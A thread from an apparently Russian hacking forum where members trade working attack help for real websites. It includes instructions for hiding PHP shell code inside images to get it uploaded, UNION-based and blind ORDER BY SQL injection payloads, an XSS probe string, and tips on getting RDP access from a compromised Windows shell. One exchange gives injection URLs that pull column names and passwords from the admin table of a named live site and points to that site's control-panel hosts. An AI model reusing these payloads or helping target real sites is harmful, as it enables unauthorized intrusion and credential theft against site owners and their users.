Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. h00lyshit!

    h00lyshit! [From Nobody To Root]

    Joined:
    10 Sep 2009
    Messages:
    289
    Likes Received:
    290
    Reputations:
    195
    Открываешь картинку любым текстовым редактором и в начало или конец вставляешь php код, как в обычный файл. Так же можно вставить код не в сам файл, а в метаданные.
    В случае жесткой фильтрации картинки, открываешь hex редактор и вставляешь код на место существующих значений.
     
    #15021 h00lyshit!, 9 Oct 2010
    Last edited: 9 Oct 2010
  2. iget

    iget New Member

    Joined:
    29 Mar 2009
    Messages:
    22
    Likes Received:
    1
    Reputations:
    0
    тогда картинка перестает быть картинкой и не загружается на сайт
     
  3. d1v

    d1v Elder - Старейшина

    Joined:
    21 Feb 2009
    Messages:
    676
    Likes Received:
    331
    Reputations:
    120
    а просто шелл с двойным расширением залить не пробывал?
     
  4. kfor

    kfor Elder - Старейшина

    Joined:
    1 Sep 2005
    Messages:
    278
    Likes Received:
    48
    Reputations:
    29

    Если ты делал как тебе сказали через хекс редактор, то картинка остаётся картинкой. скорее всего ты даже не попробовал так делать.
    http://dump.ru/file/4831477
    вот тебе для теста пхпинфо. Пробуй заливать и инклудить.
     
    #15024 kfor, 9 Oct 2010
    Last edited: 9 Oct 2010
  5. auth_root

    auth_root Member

    Joined:
    31 Jan 2010
    Messages:
    17
    Likes Received:
    10
    Reputations:
    0
    Мне так и не помогли =) Ну ладно, сам разобрался. Ещё вопрос

    Есть скуля, ветка 5.1.43
    В общем если пытаться вытянуть или посмотреть кол-во таблиц или колонок из information_schema, то сайт перестает грузиться, т.е. долго висит а потом тупо браузер говорит что не может открыть. Пробовал и локально и с дедиков и с хостов (скриптом)

    -1404+union+select+concat(database(),0x3A,version()),2+from+information_schema.tables--+

    -1404+union+select+concat(column_name,0x3A,table_name),2+from+information_schema.columns--+

    Если просто
    -1404+union+select+concat(database(),0x3A,version()),2--+

    Версию и базу выводит, но при обращении к inf schema перестает грузится. Мож фильтруется from?
    В общем что посоветуете? Если интересно поковырять-ссылку дам в пм. Не игнорьте плз =)
     
  6. kfor

    kfor Elder - Старейшина

    Joined:
    1 Sep 2005
    Messages:
    278
    Likes Received:
    48
    Reputations:
    29
    хз что может быть... давай сылку в пм.
     
  7. high_rez

    high_rez New Member

    Joined:
    23 Aug 2009
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    Еще кто нибудь объясните, если в поле Логин я ввожу '';!--"<XSS>=&{()}, и потом просматириваю код страницы, и нахожу что то типа <XSS verses &lt()&lt;, т.е. скобки остаются не измененные. Могу я их использовать для скрипта? Я где то читал, что это первый признак уязвимости.
     
    #15027 high_rez, 10 Oct 2010
    Last edited: 10 Oct 2010
  8. Zilt0

    Zilt0 New Member

    Joined:
    1 Apr 2009
    Messages:
    20
    Likes Received:
    0
    Reputations:
    0
    Всем привет,
    Есть ли у кого эксплоит этой баги:
    http://developer.joomla.org/security/news/9-security/10-core-security/315-20100701-core-sql-injection-internal-path-exposure.html

    Буду очень благодарен!!
     
  9. Malygos

    Malygos New Member

    Joined:
    9 Oct 2010
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    PHP:
    SELECT username FROM users ORDER BY username [URL]
    Is it possible to inject this? I know it is not possible to do union all select.
    site.php?orderby=ASC gives ascending and orderby=DESC gives descending.

    site.php?orderby=,password gives same as ASC
    site.php?orderby=limit 0,1 gives only first username.

    site.php?orderby=ASC, 1 gives true (everything ok on site)
    site.php?orderby=ASC, 0 gives false (content missing)

    orderby=ASC, 1=2 gives true (wtf?)

    Any help or way to inject this? Sorry for not speaking Russian!
     
    #15029 Malygos, 10 Oct 2010
    Last edited: 10 Oct 2010
  10. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,519
    Likes Received:
    401
    Reputations:
    196
    http://2600nl.net/2010/05/29/exploiting-sql-injection-in-order-by-clause-mysql-5/
     
  11. Strilo4ka

    Strilo4ka

    Joined:
    5 Apr 2009
    Messages:
    709
    Likes Received:
    729
    Reputations:
    948
    Example, we have mysql5.
    Code:
    Exploit:
    
    site.php?orderby=%2A%28IF%28ASCII%28SUBSTRING%28VERSION%28%29%2C1%2C1%29%29%3D53%2C1%2C-1%29%29%0D%0A -> true
    
    site.php?orderby=%2A%28IF%28ASCII%28SUBSTRING%28VERSION%28%29%2C1%2C1%29%29%3D52%2C1%2C-1%29%29 -> false
     
    #15031 Strilo4ka, 10 Oct 2010
    Last edited: 10 Oct 2010
  12. .:[melkiy]:.

    .:[melkiy]:. Elder - Старейшина

    Joined:
    25 Jan 2009
    Messages:
    355
    Likes Received:
    314
    Reputations:
    163
    есть шелл на вин сервере. как черед смд сделать, чтобы можно было подключится по rdp?
     
  13. Strilo4ka

    Strilo4ka

    Joined:
    5 Apr 2009
    Messages:
    709
    Likes Received:
    729
    Reputations:
    948
    там мой пост
    в консоли команды прописываеш, а потом mstsc.
     
  14. S-J

    S-J New Member

    Joined:
    24 Sep 2010
    Messages:
    84
    Likes Received:
    1
    Reputations:
    0
    Помогите раскрутить найденную уязвимость=)
    http://www.thegotomom.com/blog-post.php?id=118%20and%201=0%20union%20select%206661,%28select%20group_concat%28column_name%29%20from%20information_schema.columns%20where%20table_name%20=%200x61646d696e5f74626c%29,6663,6664,6665%20from%20admin_tbl--+
    админку найте не могу...

    //здесь не помогают ломать =\ а помогают раскрутить найденную уязвимость
     
    #15034 S-J, 10 Oct 2010
    Last edited: 10 Oct 2010
  15. d1v

    d1v Elder - Старейшина

    Joined:
    21 Feb 2009
    Messages:
    676
    Likes Received:
    331
    Reputations:
    120
    http://www.thegotomom.com/blog-post.php?id=-118+union+select+1,password,3,4,5+from+admin_tbl
     
  16. S-J

    S-J New Member

    Joined:
    24 Sep 2010
    Messages:
    84
    Likes Received:
    1
    Reputations:
    0
    Спасибо ещё бы админку)
     
  17. j0ker13

    j0ker13 Elder - Старейшина

    Joined:
    28 Jul 2008
    Messages:
    199
    Likes Received:
    16
    Reputations:
    5
    есть mssql inj
    структура таблицы:
    не получается вывести инфо из нее - на все запросы выдает:
    Invalid column name 'E-mail'.
    как обойти?
    и еще вопрос - как узнать количество записеи в табле?
     
  18. swat_

    swat_ Member

    Joined:
    4 Nov 2009
    Messages:
    137
    Likes Received:
    30
    Reputations:
    1
    cpanel.thegotomom.com

    webdisk.thegotomom.com
     
  19. Gemini12

    Gemini12 Member

    Joined:
    24 Dec 2008
    Messages:
    58
    Likes Received:
    5
    Reputations:
    0
    Шифруй слово "email" в HEX или CHAR
     
  20. -PRIVAT-

    -PRIVAT- Banned

    Joined:
    17 Apr 2010
    Messages:
    245
    Likes Received:
    139
    Reputations:
    87
    Вот скажи мне, зачем?
     
    #15040 -PRIVAT-, 11 Oct 2010
    Last edited: 12 Oct 2010
    1 person likes this.
Thread Status:
Not open for further replies.